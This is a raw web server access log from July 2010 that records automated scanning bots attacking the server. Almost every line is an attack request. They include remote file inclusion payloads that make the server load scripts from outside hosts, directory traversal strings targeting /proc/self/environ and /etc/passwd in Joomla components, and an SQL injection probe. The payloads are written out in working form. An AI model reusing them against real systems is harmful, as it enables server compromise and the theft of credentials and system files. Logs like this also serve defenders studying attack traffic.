188.165.217.175 - - [26/Jul/2010:18:37:41 +0200] "GET /logs/access_log%20%20///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
188.165.217.175 - - [26/Jul/2010:18:37:41 +0200] "GET ///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 200 666 "-" "Mozilla/5.0"
188.165.217.175 - - [26/Jul/2010:18:37:41 +0200] "GET /logs///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 200 802 "-" "Mozilla/5.0"
188.165.217.175 - - [26/Jul/2010:18:37:45 +0200] "GET ///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 200 666 "-" "Mozilla/5.0"
188.165.217.175 - - [26/Jul/2010:18:37:45 +0200] "GET /logs///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 200 802 "-" "Mozilla/5.0"
188.165.217.175 - - [26/Jul/2010:18:37:45 +0200] "GET /logs/access_log%20%20///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
188.127.248.175 - - [26/Jul/2010:18:47:55 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:47:55 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:47:55 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:48:04 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:48:04 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:48:05 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
194.149.14.77 - - [26/Jul/2010:18:53:09 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:53:09 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:53:09 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
188.127.248.175 - - [26/Jul/2010:18:55:06 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:55:07 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:55:32 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:55:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
69.57.132.57 - - [26/Jul/2010:18:57:39 +0200] "GET /logs/index.php?option=com_jashowcase&view=jashowcase&Itemid=109&catid=' HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
69.57.132.57 - - [26/Jul/2010:18:57:39 +0200] "GET /index.php?option=com_jashowcase&view=jashowcase&Itemid=109&catid=' HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
168.143.19.89 - - [26/Jul/2010:19:04:32 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.825"
168.143.19.89 - - [26/Jul/2010:19:04:32 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.825"
168.143.19.89 - - [26/Jul/2010:19:04:32 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.825"
217.16.18.219 - - [26/Jul/2010:19:45:21 +0200] "GET /logs/access_log/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:19:45:21 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:19:45:21 +0200] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
195.186.81.78 - - [26/Jul/2010:19:48:27 +0200] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 311 "-" "Mozilla/5.0"
195.186.81.78 - - [26/Jul/2010:19:48:27 +0200] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 316 "-" "Mozilla/5.0"
195.186.81.78 - - [26/Jul/2010:19:48:27 +0200] "GET /logs/access_log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 329 "-" "Mozilla/5.0"
188.165.217.175 - - [26/Jul/2010:20:08:14 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:20:08:14 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:20:08:15 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
67.218.116.170 - - [26/Jul/2010:20:12:14 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
217.16.18.219 - - [26/Jul/2010:20:22:42 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:25:01 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:25:01 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:25:01 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
188.165.217.175 - - [26/Jul/2010:21:06:31 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:11:02 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:11:02 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:14:16 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:14:16 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:14:16 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:21:21:28 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
81.93.240.46 - - [26/Jul/2010:21:21:31 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:21:31 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:24:31 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:24:31 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:24:32 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
81.93.240.46 - - [26/Jul/2010:21:24:32 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
81.93.240.46 - - [26/Jul/2010:21:24:32 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
81.93.240.46 - - [26/Jul/2010:21:24:32 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
94.23.8.200 - - [26/Jul/2010:21:24:33 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:21:24:33 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:21:24:34 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
213.229.106.147 - - [26/Jul/2010:21:24:56 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:21:24:56 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.233.211.252 - - [26/Jul/2010:21:47:20 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:24:13 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:24:13 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
38.108.124.28 - - [26/Jul/2010:22:24:23 +0200] "GET /logs//index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:22:24:23 +0200] "GET //index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:22:24:33 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:24:33 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:25:14 +0200] "GET /logs//index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:25:14 +0200] "GET //index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
38.108.124.28 - - [26/Jul/2010:22:26:32 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:22:26:32 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:22:29:19 +0200] "GET /logs/access_log//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:20 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:20 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:28 +0200] "GET /logs/access_log//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:28 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:29 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
64.182.124.1 - - [26/Jul/2010:22:37:13 +0200] "GET /logs/error_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.0" 404 377 "-" "libwww-perl/5.53"
64.182.124.1 - - [26/Jul/2010:22:37:13 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.0" 404 362 "-" "libwww-perl/5.53"
64.182.124.1 - - [26/Jul/2010:22:37:13 +0200] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.0" 404 367 "-" "libwww-perl/5.53"
62.149.171.147 - - [26/Jul/2010:22:44:32 +0200] "GET /logs//index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:44:33 +0200] "GET //index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:48:02 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:48:03 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
206.214.220.151 - - [26/Jul/2010:22:48:59 +0200] "GET /logs/error_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 377 "-" "libwww-perl/5.805"
206.214.220.151 - - [26/Jul/2010:22:48:59 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.805"
206.214.220.151 - - [26/Jul/2010:22:48:59 +0200] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 367 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:23:12:30 +0200] "GET /logs/access_log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:12:30 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:12:31 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:22:39 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:22:39 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:22:39 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:25:04 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:25:04 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:30:59 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:30:59 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:30:59 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:01 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:01 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:02 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:02 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:02 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:02 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
62.44.82.61 - - [27/Jul/2010:00:15:36 +0200] "GET /logs/*?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:15:36 +0200] "GET /*?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:15:47 +0200] "GET /logs/index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:15:48 +0200] "GET /index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:17:30 +0200] "GET /logs/index2.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:17:31 +0200] "GET /index2.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:18:48 +0200] "GET /logs/*?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:18:49 +0200] "GET /*?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:20:05 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
